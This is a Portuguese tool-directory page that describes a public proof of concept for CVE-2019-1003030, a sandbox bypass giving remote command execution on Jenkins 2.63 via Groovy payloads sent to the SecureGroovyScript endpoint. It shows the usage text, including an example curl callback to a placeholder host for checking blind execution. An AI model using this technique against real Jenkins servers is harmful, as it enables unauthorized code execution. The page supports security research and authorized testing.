Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-CVE-2019-1003030 — PoC para Jenkins 2.63 CVE-2019-1003030 | Kitploit
Ferramentas/GitHubGitHub/cyberbelly/poc-cve-2019-1003030
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubcyberbelly/poc-cve-2019-1003030

PoC-CVE-2019-1003030

PoC para Jenkins 2.63 CVE-2019-1003030

Ver Repositório
3há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC de Bypass do Sandbox de Segurança de Scripts do Jenkins 2.63

Este projeto automatiza a criação e entrega de payloads Groovy para o endpoint de validação SecureGroovyScript do Jenkins usado pelo Jenkins 2.63. A ferramenta suporta execução interativa e de comando único. O exploit não retorna saída, então você terá que fazer algumas validações como curl no seu AP para garantir que funciona.

A ferramenta suporta ambos:

  • Modo de comando interativo
  • Execução de comando único
  • Requisições GET e POST
  • Suporte opcional ao crumb CSRF do Jenkins

Aviso Legal

Este projeto é destinado apenas para pesquisa de segurança, CTFs, ambientes de laboratório e testes de penetração autorizados. Não o utilize contra sistemas sem permissão explícita.

root@kitploit:~
usage: Poc.py -u http://10.10.10.10:8080/  [-c 'curl http://10.10.10.9/callback'] [-X POST] [-p /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript]

PoC for sandbox bypass for jenkins 2.63

options:
  -h, --help            show this help message and exit
  -u, --url URL         ip of target
  -X, --method METHOD   post or get
  -b, --breadcrum BREADCRUM
                        optional jenkins crumb string
  -c, --command COMMAND
                        command to run on jenkins, not output expected
  -p, --path PATH       path to the script, you might prepend more

Omita a opção -c para entrar em um prompt interativo. Exemplo abaixo, infelizmente não há saída, então, desde que você não esteja recebendo um 404, deve estar funcionando

Baixar ferramenta
imagem